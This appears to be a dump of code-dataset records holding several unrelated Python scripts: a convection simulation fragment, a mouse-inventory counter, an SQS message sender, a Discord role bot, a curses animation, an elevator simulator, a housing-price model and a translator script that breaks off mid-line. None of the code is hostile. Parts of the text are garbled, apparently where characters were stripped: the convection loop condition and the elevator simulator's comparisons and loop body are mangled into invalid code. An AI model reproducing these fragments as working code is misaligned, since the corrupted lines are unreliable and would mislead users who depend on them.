mts=Mountains(dom,eps=TOPO_SMOOTH)\n mts.setTopography(topography)\n print((\"<%s> topography has been set up.\"%time.asctime()))\n\n#\n# let the show begin:\n#\nt1 = time.time()\nprint((\"<%s> Start time step %d (t=%s).\"%(time.asctime(),n,t)))\nwhile t TOPO_TOL * Topo_norm:\n flow.setStatus(t, v_old, p_old, stress_old)\n flow.setExternals(f=-SURFACE_LOAD*(topography-dt*v)*unitVector(DIM-1,DIM)*top_boundary_mask, restoration_factor=SURFACE_LOAD*dt*top_boundary_mask) \n flow.update(dt, iter_max=100, verbose=False)\n v=flow.getVelocity()\n mts.setTopography(topography_old)\n mts.setVelocity(v)\n topography_last, topography=topography, mts.update(dt, allow_substeps=True)\n error_Topo=sqrt(integrate(((topography-topography_last)*top_boundary_mask)**2))\n Topo_norm=sqrt(integrate((topography*top_boundary_mask)**2))\n #print(\"topography update step %d error = %e, norm = %e.\"%(i, error_Topo, Topo_norm), Lsup(v))\n i+=1\n if i > TOPO_ITER_MAX: \n raise RuntimeError(\"topography did not converge after %d steps.\"%TOPO_ITER_MAX)\n v=flow.getVelocity()\n #for d in range(DIM):\n #print(\"range %d-velocity \"%d,inf(v[d]),sup(v[d]))\n #print(\"Courant = \",inf(dom.getSize()/(length(v)+1e-19)), inf(dom.getSize()**2))\n print(\"<%s> flow solver completed.\"%time.asctime())\n n+=1\n t+=dt\n #print(\"influx= \",integrate(inner(v,dom.getNormal())), sqrt(integrate(length(v)**2,FunctionOnBoundary(dom))), integrate(1., FunctionOnBoundary(dom)))\n print(\"<%s> Time step %d (t=%e) completed.\"%(time.asctime(),n,t))\n\n #====================== setup temperature problem ========================\n heat.setValue(v=v,Q=CHI_REF*flow.getTau()**2/flow.getCurrentEtaEff())\n dt=heat.getSafeTimeStepSize()\n print(\"<%s> New time step size is %e\"%(time.asctime(),dt))\n #=========================== setup topography ============================\n if CREATE_TOPO:\n dt=min(mts.getSafeTimeStepSize()*0.5,dt)\n #print(\"<%s> New time step size is %e\"%(time.asctime(),dt))\n #print(\"<%s> Start time step %d (t=%e).\"%(time.asctime(),n+1,t+dt))\n #\n # solve temperature:\n #\n T=heat.getSolution(dt)\n print(\"Temperature range \",inf(T),sup(T))\n print(\"<%s> temperature update completed.\"%time.asctime())\n #============================== analysis =================================\n #\n # .... Nusselt number\n #\n dTdz=grad(T)[DIM-1]\n Nu=1.-integrate(v[DIM-1]*T)/integrate(dTdz)\n eta_bar=integrate(flow.getTau())/integrate(flow.getTau()/flow.getCurrentEtaEff())\n Ra_eff= (t_REF*RHO_0*G*H*(T_1-T_0)*ALPHA_0)/eta_bar\n #print(\"nusselt number = \",Nu)\n #print(\"avg. 
eta = \",eta_bar)\n #print(\"effective Rayleigh number = \",Ra_eff)\n if CREATE_TOPO:\n topo_level=integrate(topography*top_boundary_mask)/surface_area\n valleys_deep=inf(topography)\n mountains_heigh=sup(topography)\n #print(\"topography level = \",topo_level)\n #print(\"valleys deep = \",valleys_deep)\n #print(\"mountains_heigh = \",mountains_heigh)\n #diagnostics_file.write(\"%e %e %e %e %e %e %e\\n\"%(t,Nu, topo_level, valleys_deep, mountains_heigh, eta_bar, Ra_eff))\n #else:\n #diagnostics_file.write(\"%e %e %e %e\\n\"%(t,Nu, eta_bar, Ra_eff))\n # ========================================================================\n #\n # create restart/visualization files:\n #\n if t>=t_vis or n%DN_VIS==0:\n dataMgr.setTime(t)\n t_vis+=DT_VIS\n dataMgr.addData(t=t,n=n,t_vis=t_vis,dt=dt,T=T,v=v,eta=flow.getCurrentEtaEff(),stress=stress,p=p)\n if CREATE_TOPO: dataMgr.addData(topography=topography)\n dataMgr.export()\n print((\"<%s> Cycle %d (time %s) exported.\"%(time.asctime(),dataMgr.getCycle(),t)))\n\nprint((\"<%s> Calculation finalized after %s seconds.\"%(time.asctime(),time.time()-t1)))\n\n","sub_path":"finley/test/python/convection.py","file_name":"convection.py","file_ext":"py","file_size_in_byte":15987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"264545293","text":"import os\nimport sys\nimport pandas as pd\nimport numpy as np\n\n\nmaindirectory = \"G:/Behavioral Data/Sonntag Lab Dropbox/Phenotyper/Investigators/\" \ninvestigator = str(sys.argv[1])\ndirectory0 = maindirectory + investigator + \"/Data/Distance moved/\"\ntreatments = os.listdir(directory0)\nnumberofmice = 0\nfor j in treatments:\n\tos.chdir(directory0 + j)\n\tnumberofmice = numberofmice + int(len(os.listdir(directory0 + j)))\n\tos.chdir(directory0)\n\nprint(investigator + \" has run \" + str(numberofmice) + \" mice through the Phenotypers\")","sub_path":"investigatormouseinventory.py","file_name":"investigatormouseinventory.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"584394454","text":"import argparse\nimport logging\nimport sys\nfrom time import sleep\n\nimport boto3\nimport Faker\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--queue-name\", \"-q\", required=True,\n help=\"SQS queue name\")\nparser.add_argument(\"--interval\", \"-i\", required=True,\n help=\"timer interval\", type=float)\nparser.add_argument(\"--message\", \"-m\", help=\"message to send\")\nparser.add_argument(\"--log\", \"-l\", default=\"INFO\",\n help=\"logging level\")\nargs = parser.parse_args()\n\nif args.log:\n logging.basicConfig(\n format='[%(levelname)s] %(message)s', level=args.log)\n\nelse:\n parser.print_help(sys.stderr)\n\nsqs = boto3.client('sqs')\n\nresponse = sqs.get_queue_url(QueueName=args.queue_name)\n\nqueue_url = response['QueueUrl']\n\nlogging.info(queue_url)\n\nwhile True:\n message = args.message\n if not args.message:\n fake = Faker()\n message = fake.text()\n\n logging.info('Sending message: ' + message)\n\n response = sqs.send_message(\n QueueUrl=queue_url, MessageBody=message)\n\n logging.info('MessageId: ' + response['MessageId'])\n sleep(args.interval)","sub_path":"SQS/send_message_sqs.py","file_name":"send_message_sqs.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"272010112","text":"import discord\nimport os\n\n\nclient = 
discord.Client(command_prefix='/')\ntoken = os.environ['DISCORD_BOT_TOKEN']\n\nID_CHANNEL_README = 860865623471030324 # ID of the target channel\nID_ROLE_WELCOME = 860874687621758977 # ID of the role to assign\n\n@client.event\nasync def on_raw_reaction_add(payload):\n # Get the Channel object from channel_id\n channel = client.get_channel(payload.channel_id)\n\n # Ignore any channel other than the target one\n if channel.id != ID_CHANNEL_README:\n return\n\n # Get the Guild object from guild_id\n guild = client.get_guild(payload.guild_id)\n\n # Get the Member object from user_id\n # member = guild.get_member(payload.user_id)\n\n # Get the Role object from the prepared role ID\n role = guild.get_role(ID_ROLE_WELCOME)\n\n # Grant the role to the member who added the reaction\n await payload.member.add_roles(role)\n\n # Send a welcome message so the change is easy to see\n await channel.send('Welcome!')\n\n@client.event\nasync def on_ready():\n print(\"Bot started successfully!\")\n print(client.user.name) # bot name\n print(client.user.id) # bot ID\n print(discord.__version__) # discord.py version\n print('------')\n await client.change_presence(activity=discord.Game(name=\"Managing roles!\"))\n\n\nclient.run(token)\n","sub_path":"discordbot.py","file_name":"discordbot.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"489907651","text":"import asyncio\nimport curses\n\nfrom curses_tools import discover_active_area\n\n\nasync def fire(canvas, start_row, start_column, rows_speed=-0.3, columns_speed=0):\n \"\"\"Display animation of gun shot. Direction and speed can be specified.\"\"\"\n\n row, column = start_row, start_column\n\n canvas.addstr(round(row), round(column), '*')\n await asyncio.sleep(0)\n\n canvas.addstr(round(row), round(column), 'O')\n await asyncio.sleep(0)\n canvas.addstr(round(row), round(column), ' ')\n\n row += rows_speed\n column += columns_speed\n\n symbol = '-' if columns_speed else '|'\n\n rows, columns = canvas.getmaxyx()\n max_row, max_column = rows - 1, columns - 1\n\n curses.beep()\n\n while 0 < row < max_row and 0 < column < max_column:\n canvas.addstr(round(row), round(column), symbol)\n await asyncio.sleep(0)\n canvas.addstr(round(row), round(column), ' ')\n row += rows_speed\n column += columns_speed\n\n\ndef prepare_fire_coroutine(canvas):\n active_area = discover_active_area(canvas)\n return fire(\n canvas=canvas,\n start_row=active_area['window_center_row'],\n start_column=active_area['window_center_column'],\n )\n","sub_path":"animations_code/fire_animation.py","file_name":"fire_animation.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"606430183","text":"class LiftSim(object):\n\n def __init__(self,queues, capacity):\n self.queues=queues\n self.capacity=capacity\n \n def theLift(self):\n queues=[list(i) for i in self.queues]\n target=[]\n path=[0]\n ground=0\n topFloor=len(queues) \n direction=1 # 1 is going UP and -1 is going DOWN\n people=0\n capac=self.capacity\n \n while queues.count([])!=len(queues) or len(target)!=0: #check if there's people queueing\n for i in range(ground, topFloor, direction):\n while i in target:\n people-=1\n if i!= path[-1]: #check if there's multiple people going to the same floor\n path.append(i)\n target.remove(i)\n if queues[i]:\n for j in queues[i][:]:\n if (j>i and direction+1) or (not direction+1 and j=capac:\n if i!=path[-1]:\n path.append(i)\n direction *=-1\n ground,topFloor=topFloor+direction,ground+direction #Lift changes direction\n if path[-1]!=0:\n return path+[0]\n else:\n return 
path\n","sub_path":"simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"146474","text":"import pandas as pd\nimport numpy as np \nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import cross_val_score\n\n\nhousing = pd.read_csv(\"data.csv\")\n\nsplit = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)\nfor train_index, test_index in split.split(housing, housing['CHAS']):\n strat_train_set = housing.loc[train_index]\n strat_test_set = housing.loc[test_index]\n\nhousing = strat_train_set.drop(\"MEDV\", axis=1)\nhousing_labels = strat_train_set[\"MEDV\"].copy()\n\nmy_pipeline = Pipeline([\n ('imputer', SimpleImputer(strategy = \"median\")),\n ('std_scaler', StandardScaler()),\n\n])\n\nhousing_new = my_pipeline.fit_transform(housing) \n\nmodel = RandomForestRegressor()\nmodel.fit(housing_new, housing_labels)\n\nsome_data = housing.iloc[:5]\nsome_labels = housing_labels.iloc[:5]\nprepared_data = my_pipeline.transform(some_data)\n\n#print(model.predict(prepared_data))\n#print(list(some_labels))\n\nhousing_predictions = model.predict(housing_new)\nmse = mean_squared_error(housing_labels, housing_predictions)\nrmse = np.sqrt(mse)\n\nprint(rmse)\n\n\nscore = cross_val_score(model, housing_new, housing_labels, scoring = \"neg_mean_squared_error\", cv = 10)\nrmse_scores = np.sqrt(-score)\n\ndef print_scores(rmse_scores):\n print(\"Scores\", score, \"\\n\")\n print(\"mean\", score.mean(), \"\\n\")\n print(\"Standard Deviation\", score.std(), \"\\n\")\n \nprint(print_scores(rmse_scores))\n\n\n\n","sub_path":"Real Estate ML Project/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"199617838","text":"import cv2\nimport numpy as np\n\nimport ip_draw as draw\nimport ip_preprocessing as pre\nimport ip_detection_utils as util\nimport ocr_classify_text as ocr\nfrom CONFIG import Config\n\nC = Config()\n\n\ndef get_corner(boundaries):\n \"\"\"\n Get the top left and bottom right points of boundary\n :param boundaries: boundary: [top, bottom, left, right]\n -> up, bottom: (column_index, min/max row border)\n -> left, right: (row_index, min/max column border) detect range of each row\n :return: corners: [(top_left, bottom_right)]\n -> top_left: (column_min, row_min)\n -> bottom_right: (column_max, row_max)\n \"\"\"\n corners = []\n for boundary in boundaries:\n top_left = (min(boundary[0][0][0], boundary[1][-1][0]), min(boundary[2][0][0], boundary[3][-1][0]))\n bottom_right = (max(boundary[0][0][0], boundary[1][-1][0]), max(boundary[2][0][0], boundary[3][-1][0]))\n corner = (top_left, bottom_right)\n corners.append(corner)\n return corners\n\n\ndef select_corner(corners, compos_class, class_name):\n \"\"\"\n Select corners in given compo type\n \"\"\"\n corners_wanted = []\n for i in range(len(compos_class)):\n if compos_class[i] == class_name:\n corners_wanted.append(corners[i])\n return corners_wanted\n\n\ndef merge_corner(org, corners, compos_class, is_merge_nested):\n \"\"\"\n i. merge overlapped corners\n ii. 
remove nested corners\n :param corners: corners: [(top_left, bottom_right)]\n -> top_left: (column_min, row_min)\n -> bottom_right: (column_max, row_max)\n :return: new corners\n \"\"\"\n def merge_overlapped(corner_a, corner_b):\n (top_left_a, bottom_right_a) = corner_a\n (col_min_a, row_min_a) = top_left_a\n (col_max_a, row_max_a) = bottom_right_a\n (top_left_b, bottom_right_b) = corner_b\n (col_min_b, row_min_b) = top_left_b\n (col_max_b, row_max_b) = bottom_right_b\n\n col_min = min(col_min_a, col_min_b)\n col_max = max(col_max_a, col_max_b)\n row_min = min(row_min_a, row_min_b)\n row_max = max(row_max_a, row_max_b)\n return (col_min, row_min), (col_max, row_max)\n\n new_corners = []\n new_class = []\n for i in range(len(corners)):\n is_intersected = False\n for j in range(len(new_corners)):\n r = util.corner_relation_nms(org, corners[i], new_corners[j])\n # r = util.corner_relation(corners[i], new_corners[j])\n if is_merge_nested:\n # if corners[i] is in new_corners[j], ignore corners[i]\n if r == -1:\n is_intersected = True\n break\n # if new_corners[j] is in corners[i], replace new_corners[j] with corners[i]\n elif r == 1:\n is_intersected = True\n new_corners[j] = corners[i]\n new_class[j] = compos_class[i]\n\n # if above IoU threshold, and corners[i] is in new_corners[j], ignore corners[i]\n if r == -2:\n is_intersected = True\n break\n # if above IoU threshold, and new_corners[j] is in corners[i], replace new_corners[j] with corners[i]\n elif r == 2:\n is_intersected = True\n new_corners[j] = corners[i]\n new_class[j] = compos_class[i]\n # if [i] and [j] are overlapped but no containing relation, merge corners with same class\n elif r == 3:\n is_intersected = True\n if compos_class[i] == new_class[j]:\n new_corners[j] = merge_overlapped(corners[i], new_corners[j])\n\n if not is_intersected:\n new_corners.append(corners[i])\n new_class.append(compos_class[i])\n return new_corners, new_class\n\n\ndef strip_img(corners_compo, compos_class, corners_img):\n \"\"\"\n Separate img from other compos\n :return: compos without img\n \"\"\"\n corners_compo_withuot_img = []\n compo_class_withuot_img = []\n for i in range(len(compos_class)):\n if compos_class[i] == 'img':\n corners_img.append(corners_compo[i])\n else:\n corners_compo_withuot_img.append(corners_compo[i])\n compo_class_withuot_img.append(compos_class[i])\n return corners_compo_withuot_img, compo_class_withuot_img\n\n\ndef compo_in_img(processing, org, binary, corners_img,\n corners_block, corners_compo, compos_class):\n \"\"\"\n Detect potential UI components inner img;\n Only leave non-img\n \"\"\"\n corners_img_new = []\n pad = 2\n for corner in corners_img:\n (top_left, bottom_right) = corner\n (col_min, row_min) = top_left\n (col_max, row_max) = bottom_right\n col_min = max(col_min - pad, 0)\n col_max = min(col_max + pad, org.shape[1])\n row_min = max(row_min - pad, 0)\n row_max = min(row_max + pad, org.shape[0])\n height_img = row_max - row_min\n width_img = col_max - col_min\n\n img_area = height_img * width_img\n compo_area = 0\n\n # ignore small ones\n # if height_img <= min_compo_edge_length or width_img <= min_compo_edge_length:\n # continue\n \n clip_org = org[row_min:row_max, col_min:col_max]\n clip_bin = binary[row_min:row_max, col_min:col_max]\n clip_bin = pre.reverse_binary(clip_bin)\n\n corners_block_new, corners_compo_new, compos_class_new = processing(clip_org, clip_bin, main=False)\n corners_block_new = util.corner_cvt_relative_position(corners_block_new, col_min, row_min)\n corners_compo_new = 
util.corner_cvt_relative_position(corners_compo_new, col_min, row_min)\n\n assert len(corners_compo_new) == len(compos_class_new)\n\n # ignore blocks superposed on its parent img\n for b in corners_block_new:\n (col_min_new, row_min_new), (col_max_new, row_max_new) = b\n height_new = row_max_new - row_min_new\n width_new = col_max_new - col_min_new\n if height_new / height_img < 0.9 and width_new / width_img < 0.9:\n corners_block.append(b)\n compo_area += height_new * width_new\n\n # only leave non-img elements\n for i in range(len(corners_compo_new)):\n if compos_class_new[i] != 'img':\n # ignore compos superposed on its parent img\n (col_min_new, row_min_new), (col_max_new, row_max_new) = corners_compo_new[i]\n height_new = row_max_new - row_min_new\n width_new = col_max_new - col_min_new\n\n corners_compo.append(corners_compo_new[i])\n compos_class.append(compos_class_new[i])\n compo_area += height_new * width_new\n\n # ignore imgs full of components\n if compo_area / img_area < 0.5:\n corners_img_new.append(corner)\n\n return corners_block, corners_img_new, corners_compo, compos_class\n\n\ndef block_or_compo(org, binary, corners,\n max_thickness=C.THRESHOLD_BLOCK_MAX_BORDER_THICKNESS, max_block_cross_points=C.THRESHOLD_BLOCK_MAX_CROSS_POINT,\n min_compo_w_h_ratio=C.THRESHOLD_UICOMPO_MIN_W_H_RATIO, max_compo_w_h_ratio=C.THRESHOLD_UICOMPO_MAX_W_H_RATIO,\n min_block_edge=C.THRESHOLD_BLOCK_MIN_EDGE_LENGTH):\n \"\"\"\n Check if the objects are img components or just block\n :param org: Original image\n :param binary: Binary image from pre-processing\n :param corners: [(top_left, bottom_right)]\n -> top_left: (column_min, row_min)\n -> bottom_right: (column_max, row_max)\n :param max_thickness: The max thickness of border of blocks\n :param max_block_cross_points: Ratio of point of interaction\n :return: corners of blocks and imgs\n \"\"\"\n blocks = []\n imgs = []\n compos = []\n for corner in corners:\n (top_left, bottom_right) = corner\n (col_min, row_min) = top_left\n (col_max, row_max) = bottom_right\n height = row_max - row_min\n width = col_max - col_min\n\n block = False\n vacancy = [0, 0, 0, 0]\n for i in range(1, max_thickness):\n try:\n # top to bottom\n if vacancy[0] == 0 and (col_max - col_min - 2 * i) != 0 and (\n np.sum(binary[row_min + i, col_min + i: col_max - i]) / 255) / (col_max - col_min - 2 * i) <= max_block_cross_points:\n vacancy[0] = 1\n # bottom to top\n if vacancy[1] == 0 and (col_max - col_min - 2 * i) != 0 and (\n np.sum(binary[row_max - i, col_min + i: col_max - i]) / 255) / (col_max - col_min - 2 * i) <= max_block_cross_points:\n vacancy[1] = 1\n # left to right\n if vacancy[2] == 0 and (row_max - row_min - 2 * i) != 0 and (\n np.sum(binary[row_min + i: row_max - i, col_min + i]) / 255) / (row_max - row_min - 2 * i) <= max_block_cross_points:\n vacancy[2] = 1\n # right to left\n if vacancy[3] == 0 and (row_max - row_min - 2 * i) != 0 and (\n np.sum(binary[row_min + i: row_max - i, col_max - i]) / 255) / (row_max - row_min - 2 * i) <= max_block_cross_points:\n vacancy[3] = 1\n if np.sum(vacancy) == 4:\n block = True\n except:\n pass\n\n # too big to be UI components\n if block:\n if height > min_block_edge and width > min_block_edge:\n blocks.append(corner)\n else:\n if min_compo_w_h_ratio < width / height < max_compo_w_h_ratio:\n compos.append(corner)\n # filter out small objects\n else:\n if height > min_block_edge:\n imgs.append(corner)\n # print(height, width)\n else:\n if min_compo_w_h_ratio < width / height < 
max_compo_w_h_ratio:\n compos.append(corner)\n return blocks, imgs, compos\n\n\ndef compo_irregular(org, corners,\n corners_img, corners_compo, # output\n min_block_edge=C.THRESHOLD_BLOCK_MIN_EDGE_LENGTH,\n min_compo_w_h_ratio=C.THRESHOLD_UICOMPO_MIN_W_H_RATIO, max_compo_w_h_ratio=C.THRESHOLD_UICOMPO_MAX_W_H_RATIO):\n \"\"\"\n Select potential irregular shaped elements by checking the height and width\n Check the edge ratio for img components to avoid text misrecognition\n :param org: Original image\n :param corners: [(top_left, bottom_right)]\n -> top_left: (column_min, row_min)\n -> bottom_right: (column_max, row_max)\n :param min_compo_edge: ignore small objects\n :return: corners of img\n \"\"\"\n for corner in corners:\n (top_left, bottom_right) = corner\n (col_min, row_min) = top_left\n (col_max, row_max) = bottom_right\n height = row_max - row_min\n width = col_max - col_min\n\n # select UI component candidates\n if height > min_block_edge:\n corners_img.append(corner)\n else:\n if min_compo_w_h_ratio < width / height < max_compo_w_h_ratio:\n corners_compo.append(corner)\n\n\ndef img_shrink(org, binary, corners,\n min_line_length_h=C.THRESHOLD_LINE_MIN_LENGTH_H, min_line_length_v=C.THRESHOLD_LINE_MIN_LENGTH_V,\n max_thickness=C.THRESHOLD_LINE_THICKNESS):\n \"\"\"\n For imgs that are part of a block, strip the img\n \"\"\"\n\n corners_shrunken = []\n pad = 2\n for corner in corners:\n (top_left, bottom_right) = corner\n (col_min, row_min) = top_left\n (col_max, row_max) = bottom_right\n\n col_min = max(col_min - pad, 0)\n col_max = min(col_max + pad, org.shape[1])\n row_min = max(row_min - pad, 0)\n row_max = min(row_max + pad, org.shape[0])\n\n clip_bin = binary[row_min:row_max, col_min:col_max]\n clip_org = org[row_min:row_max, col_min:col_max]\n\n # detect lines in the image\n lines_h, lines_v = line_detection(clip_bin, min_line_length_h, min_line_length_v, max_thickness)\n # select those perpendicularly intersect with others at endpoints\n lines_h, lines_v = util.line_check_perpendicular(lines_h, lines_v, max_thickness)\n # convert the position of lines into relative position in the entire image\n lines_h, lines_v = util.line_cvt_relative_position(col_min, row_min, lines_h, lines_v)\n\n # shrink corner according to the lines\n corner_shrunken = util.line_shrink_corners(corner, lines_h, lines_v)\n corners_shrunken.append(corner_shrunken)\n return corners_shrunken\n\n\ndef rm_img_in_compo(corners_img, corners_compo):\n \"\"\"\n Remove imgs in component\n \"\"\"\n corners_img_new = []\n for img in corners_img:\n is_nested = False\n for compo in corners_compo:\n if util.corner_relation(img, compo) == -1:\n is_nested = True\n break\n if not is_nested:\n corners_img_new.append(img)\n return corners_img_new\n\n\n# remove imgs that contain text\ndef rm_text(org, corners, compo_class,\n max_text_height=C.THRESHOLD_TEXT_MAX_HEIGHT, max_text_width=C.THRESHOLD_TEXT_MAX_WIDTH,\n ocr_padding=C.OCR_PADDING, ocr_min_word_area=C.OCR_MIN_WORD_AREA, show=False):\n \"\"\"\n Remove area that full of text\n :param org: original image\n :param corners: [(top_left, bottom_right)]\n -> top_left: (column_min, row_min)\n -> bottom_right: (column_max, row_max)\n :param compo_class: classes of corners\n :param max_text_height: Too large to be text\n :param max_text_width: Too large to be text\n :param ocr_padding: Padding for clipping\n :param ocr_min_word_area: If too text area ratio is too large\n :param show: Show or not\n :return: corners without text objects\n \"\"\"\n new_corners = []\n new_class = 
[]\n for i in range(len(corners)):\n corner = corners[i]\n (top_left, bottom_right) = corner\n (col_min, row_min) = top_left\n (col_max, row_max) = bottom_right\n height = row_max - row_min\n width = col_max - col_min\n # highly likely to be block or img if too large\n if height > max_text_height and width > max_text_width:\n new_corners.append(corner)\n new_class.append(compo_class[i])\n else:\n row_min = row_min - ocr_padding if row_min - ocr_padding >= 0 else 0\n row_max = row_max + ocr_padding if row_max + ocr_padding < org.shape[0] else org.shape[0]\n col_min = col_min - ocr_padding if col_min - ocr_padding >= 0 else 0\n col_max = col_max + ocr_padding if col_max + ocr_padding < org.shape[1] else org.shape[1]\n # check if this area is text\n clip = org[row_min: row_max, col_min: col_max]\n if not ocr.is_text(clip, ocr_min_word_area, show=show):\n new_corners.append(corner)\n new_class.append(compo_class[i])\n return new_corners, new_class\n\n\ndef line_detection(binary,\n min_line_length_h=C.THRESHOLD_LINE_MIN_LENGTH_H, min_line_length_v=C.THRESHOLD_LINE_MIN_LENGTH_V,\n max_thickness=C.THRESHOLD_LINE_THICKNESS):\n \"\"\"\n Detect lines\n :param binary: Binary image from pre-processing\n :param min_line_length_h: Min length for horizontal lines\n :param min_line_length_v: Min length for vertical lines\n :param max_thickness\n :return: lines: [line_h, line_v]\n -> line_h: horizontal {'head':(column_min, row), 'end':(column_max, row), 'thickness':int)\n -> line_v: vertical {'head':(column, row_min), 'end':(column, row_max), 'thickness':int}\n \"\"\"\n def no_neighbor(start_row, start_col, mode, line=None):\n \"\"\"\n check this point has adjacent points in orthogonal direction\n \"\"\"\n if mode == 'h':\n for t in range(max_thickness + 1):\n if start_row + t >= binary.shape[0] or binary[start_row + t, start_col] == 0:\n # if not start point, update the thickness of this line\n if line is not None:\n line['thickness'] = max(line['thickness'], t)\n return True\n mark_h[start_row + t, start_col] = 255\n return False\n elif mode == 'v':\n for t in range(max_thickness + 1):\n if start_col + t >= binary.shape[1] or binary[start_row, start_col + t] == 0:\n # if not start point, update the thickness of this line\n if line is not None:\n line['thickness'] = max(line['thickness'], t)\n return True\n mark_v[start_row, start_col + t] = 255\n return False\n\n row, column = binary.shape[0], binary.shape[1]\n mark_h = np.zeros(binary.shape, dtype=np.uint8)\n mark_v = np.zeros(binary.shape, dtype=np.uint8)\n lines_h = []\n lines_v = []\n x, y = 0, 0\n while x < row - 1 or y < column - 1:\n # horizontal\n new_line = False\n head, end = None, None\n line = {}\n for j in range(column):\n # line start\n if not new_line and mark_h[x][j] == 0 and binary[x][j] > 0 and no_neighbor(x, j, 'h'):\n head = j\n new_line = True\n line['head'] = [head, x]\n line['thickness'] = -1\n # line end\n elif new_line and (j == column - 1 or mark_h[x][j] > 0 or binary[x][j] == 0 or not no_neighbor(x, j, 'h', line)):\n end = j\n new_line = False\n if end - head > min_line_length_h:\n line['end'] = [end, x]\n lines_h.append(line)\n line = {}\n\n # vertical\n new_line = False\n head, end = None, None\n line = {}\n for i in range(row):\n # line start\n if not new_line and mark_v[i][y] == 0 and binary[i][y] > 0 and no_neighbor(i, y, 'v'):\n head = i\n new_line = True\n line['head'] = [y, head]\n line['thickness'] = 0\n # line end\n elif new_line and (i == row - 1 or mark_v[i][y] > 0 or binary[i][y] == 0 or not no_neighbor(i, y, 'v', 
line)):\n end = i\n new_line = False\n if end - head > min_line_length_v:\n line['end'] = [y, end]\n lines_v.append(line)\n line = {}\n\n if x < row - 1:\n x += 1\n if y < column - 1:\n y += 1\n return lines_h, lines_v\n\n\n# take the binary image as input\n# calculate the connected regions -> get the bounding boundaries of them -> check if those regions are rectangles\n# return all boundaries and boundaries of rectangles\ndef boundary_detection(binary,\n min_obj_area=C.THRESHOLD_OBJ_MIN_AREA, min_obj_perimeter=C.THRESHOLD_OBJ_MIN_PERIMETER,\n line_thickness=C.THRESHOLD_LINE_THICKNESS, min_rec_evenness=C.THRESHOLD_REC_MIN_EVENNESS,\n max_dent_ratio=C.THRESHOLD_REC_MAX_DENT_RATIO, show=False):\n \"\"\"\n :param binary: Binary image from pre-processing\n :param min_obj_area: If not pass then ignore the small object\n :param min_obj_perimeter: If not pass then ignore the small object\n :param line_thickness: If not pass then ignore the slim object\n :param min_rec_evenness: If not pass then this object cannot be rectangular\n :param max_dent_ratio: If not pass then this object cannot be rectangular\n :return: boundary: [top, bottom, left, right]\n -> up, bottom: (column_index, min/max row border)\n -> left, right: (row_index, min/max column border) detect range of each row\n \"\"\"\n mark = np.full(binary.shape, 0, dtype=np.uint8)\n boundary_all = []\n boundary_rec = []\n boundary_nonrec = []\n row, column = binary.shape[0], binary.shape[1]\n\n for i in range(row):\n for j in range(column):\n if binary[i, j] == 255 and mark[i, j] == 0:\n # get connected area\n area = util.boundary_bfs_connected_area(binary, i, j, mark)\n # ignore small area\n if len(area) < min_obj_area:\n continue\n\n # calculate the boundary of the connected area\n boundary = util.boundary_get_boundary(area)\n # ignore small area\n perimeter = np.sum([len(b) for b in boundary])\n if perimeter < min_obj_perimeter:\n continue\n\n # check if it is line by checking the length of edges\n if util.boundary_is_line(boundary, line_thickness):\n continue\n\n # rectangle check\n if util.boundary_is_rectangle(boundary, min_rec_evenness, max_dent_ratio):\n boundary_rec.append(boundary)\n else:\n boundary_nonrec.append(boundary)\n\n if show:\n print('Area:%d, Perimeter:%d' % (len(area), perimeter))\n boundary_all.append(boundary)\n draw.draw_boundary(boundary_all, binary.shape, show=True)\n\n return boundary_rec, boundary_nonrec\n","sub_path":"code/PROJECT/integration-v2/lib/ip_detection.py","file_name":"ip_detection.py","file_ext":"py","file_size_in_byte":21616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"27860905","text":"# -*- coding: utf-8 -*-\nimport requests\nimport sys\n\n\nfrom bs4 import BeautifulSoup\n\nsupporting_languages = {\"1\": \"Arabic\",\n \"2\": \"German\",\n \"3\": \"English\",\n \"4\": \"Spanish\",\n \"5\": \"French\",\n \"6\": \"Hebrew\",\n \"7\": \"Japanese\",\n \"8\": \"Dutch\",\n \"9\": \"Polish\",\n \"10\": \"Portuguese\",\n \"11\": \"Romanian\",\n \"12\": \"Russian\",\n \"13\": \"Turkish\"}\nsupporting_languages_tags = {\"1\": \"rtl arabic\",\n \"6\": \"rtl\"}\n\ngreeting = \"Hello, you're welcome to the translator.\\nTranslator supports:\\n\" \\\n + \"\\n\".join([key + '.' 
+ value for key, value in supporting_languages.items()])\nif sys.argv[1:4]:\n from_language = {value.lower(): key for key, value in supporting_languages.items()}[sys.argv[1]]\n to_language = \"0\" if sys.argv[2] == \"all\" else\\\n {value.lower(): key for key, value in supporting_languages.items()}[sys.argv[2]]\n word_to_translate = sys.argv[3]\nelse:\n print(greeting)\n from_language = input(\"Type the number of your language: \")\n to_language = input(\"Type the number of a language you want to translate to or '0' to translate to all languages:\")\n word_to_translate = input(\"Type the word you want to translate: \")\n\n\ndef to_file_and_terminal(func):\n def wrapper(*args):\n out = func(*args)\n file.write(out)\n print(out, end=\"\")\n return wrapper\n\n\n@to_file_and_terminal\ndef translate(from_lang, to_lang, word):\n link = r\"https://context.reverso.net/translation/\" \\\n + supporting_languages[from_lang].lower() + \"-\" \\\n + supporting_languages[to_lang].lower() + \"/\" + word\n\n r = requests.get(link, 